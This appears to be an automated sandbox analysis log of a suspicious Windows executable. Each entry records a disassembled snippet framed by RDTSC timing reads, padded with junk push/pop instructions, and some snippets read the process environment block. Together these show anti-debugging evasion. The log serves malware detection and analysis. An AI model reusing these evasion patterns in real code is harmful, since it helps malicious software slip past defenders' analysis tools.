Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409A47 second address: 1409A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF6D0B6482Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FF6D0B64816h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409A71 second address: 1409A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 jp 00007FF6D0B95BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007FF6D0B95BEEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409A8F second address: 1409AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 ja 00007FF6D0B64816h 0x0000000e jp 00007FF6D0B64816h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409AA8 second address: 1409ABE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B95BEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409ABE second address: 1409AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098C7 second address: 14098D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098D4 second address: 14098E2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6D0B64816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098E2 second address: 14098E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098E6 second address: 14098EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14111FA second address: 1411205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1411205 second address: 1411211 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF6D0B64816h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1411211 second address: 1411217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1411217 second address: 141121B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FAB0 second address: 140FAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FC07 second address: 140FC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FC0B second address: 140FC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF6D0B95BF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FC26 second address: 140FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FD73 second address: 140FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007FF6D0B95BEEh 0x0000000f jmp 00007FF6D0B95BF7h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14100A6 second address: 14100AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14100AA second address: 14100CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF6D0B95BF8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14100CC second address: 14100D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1410555 second address: 1410561 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B95BE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1410561 second address: 141056D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1412A7A second address: 1412A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14171A2 second address: 14171B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jc 00007FF6D0B64834h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14171B2 second address: 14171B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E6E second address: 1416E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E74 second address: 1416E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E7A second address: 1416E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E7F second address: 1416E91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E91 second address: 1416E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416E97 second address: 1416EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 jp 00007FF6D0B95BE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416EA8 second address: 1416EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1416EB1 second address: 1416EBB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF6D0B95BE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1454A3D second address: 1454A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Fh 0x00000009 ja 00007FF6D0B64816h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14548C6 second address: 14548CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14548CC second address: 14548D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 144F8C3 second address: 144F8F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF5h 0x00000007 jo 00007FF6D0B95BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF6D0B95BF0h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1463886 second address: 1463894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14636CB second address: 14636DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FF6D0B95BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14636DC second address: 1463715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Ch 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FF6D0B64828h 0x00000012 je 00007FF6D0B64816h 0x00000018 jmp 00007FF6D0B6481Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007FF6D0B64816h 0x00000025 js 00007FF6D0B64816h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1463715 second address: 146372C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF6D0B95BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007FF6D0B95BE6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1467B2C second address: 1467B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1467C7C second address: 1467C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1467C83 second address: 1467CB1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF6D0B6481Eh 0x00000008 jmp 00007FF6D0B6481Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FF6D0B64824h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FF6D0B64816h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152CF88 second address: 152CF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D225 second address: 152D22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D22C second address: 152D299 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6D0B95BF8h 0x00000008 jmp 00007FF6D0B95BF2h 0x0000000d jc 00007FF6D0B95C17h 0x00000013 jmp 00007FF6D0B95BF9h 0x00000018 jmp 00007FF6D0B95BF8h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jmp 00007FF6D0B95BF6h 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D3FB second address: 152D3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D3FF second address: 152D430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF6D0B95BF5h 0x0000000b push ecx 0x0000000c jmp 00007FF6D0B95BF1h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D430 second address: 152D434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 152D6FE second address: 152D728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B95BEEh 0x00000009 popad 0x0000000a jnp 00007FF6D0B95BFBh 0x00000010 jmp 00007FF6D0B95BEFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1532144 second address: 153216C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6D0B64816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D23A9h], eax 0x00000011 push dword ptr [ebp+122D1BEAh] 0x00000017 sub edx, dword ptr [ebp+122D2915h] 0x0000001d push CF217A4Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 153216C second address: 153217D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 15337CC second address: 15337D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF6D0B64816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00007 second address: 6F0000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0000E second address: 6F00059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF6D0B64828h 0x00000009 add al, 00000068h 0x0000000c jmp 00007FF6D0B6481Bh 0x00000011 popfd 0x00000012 mov bh, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d call 00007FF6D0B64823h 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00059 second address: 6F000EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FF6D0B95BEEh 0x00000012 mov cx, D2B1h 0x00000016 pop eax 0x00000017 pushfd 0x00000018 jmp 00007FF6D0B95BF7h 0x0000001d jmp 00007FF6D0B95BF3h 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 mov si, 140Bh 0x0000002b pushfd 0x0000002c jmp 00007FF6D0B95BF0h 0x00000031 or ah, 00000018h 0x00000034 jmp 00007FF6D0B95BEBh 0x00000039 popfd 0x0000003a popad 0x0000003b mov eax, dword ptr fs:[00000030h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000EB second address: 6F000EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000EF second address: 6F000F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000F3 second address: 6F000F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F000F9 second address: 6F00138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007FF6D0B95BF0h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FF6D0B95BF9h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00138 second address: 6F0013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0013E second address: 6F00142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00142 second address: 6F00146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00146 second address: 6F0016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF6D0B95BF6h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0016C second address: 6F00170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00170 second address: 6F0018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0018D second address: 6F001AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F001AE second address: 6F001C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B95BF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F001C9 second address: 6F001CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F001CD second address: 6F00224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FF6D0B95BF2h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 mov esi, dword ptr [775606ECh] 0x0000001f pushad 0x00000020 mov cx, 14E7h 0x00000024 pushfd 0x00000025 jmp 00007FF6D0B95BECh 0x0000002a and si, 9918h 0x0000002f jmp 00007FF6D0B95BEBh 0x00000034 popfd 0x00000035 popad 0x00000036 test esi, esi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00224 second address: 6F002EA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF6D0B64820h 0x00000008 and al, 00000078h 0x0000000b jmp 00007FF6D0B6481Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 call 00007FF6D0B64826h 0x00000019 pop esi 0x0000001a pushfd 0x0000001b jmp 00007FF6D0B6481Bh 0x00000020 add ecx, 1DE6BFEEh 0x00000026 jmp 00007FF6D0B64829h 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e jne 00007FF6D0B65602h 0x00000034 jmp 00007FF6D0B6481Eh 0x00000039 xchg eax, edi 0x0000003a jmp 00007FF6D0B64820h 0x0000003f push eax 0x00000040 jmp 00007FF6D0B6481Bh 0x00000045 xchg eax, edi 0x00000046 jmp 00007FF6D0B64826h 0x0000004b call dword ptr [77530B60h] 0x00000051 mov eax, 756AE5E0h 0x00000056 ret 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FF6D0B6481Ah 0x00000060 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F002EA second address: 6F002F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F002F0 second address: 6F00368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B64823h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d jmp 00007FF6D0B64826h 0x00000012 pop edi 0x00000013 jmp 00007FF6D0B64820h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a mov ecx, 1034E63Dh 0x0000001f mov edx, esi 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov bl, 2Ch 0x00000026 pushfd 0x00000027 jmp 00007FF6D0B6481Eh 0x0000002c adc cx, CB48h 0x00000031 jmp 00007FF6D0B6481Bh 0x00000036 popfd 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00368 second address: 6F0036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0036C second address: 6F00372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00372 second address: 6F0039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 239E39AFh 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF6D0B95BF8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0039D second address: 6F003A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F003A1 second address: 6F003A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F003A7 second address: 6F0040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 call 00007FF6D0B6481Eh 0x00000015 pushfd 0x00000016 jmp 00007FF6D0B64822h 0x0000001b and cx, F598h 0x00000020 jmp 00007FF6D0B6481Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 push dword ptr [eax+18h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF6D0B64821h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F0040A second address: 6F00410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00410 second address: 6F00414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 6F00491 second address: 6F004A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
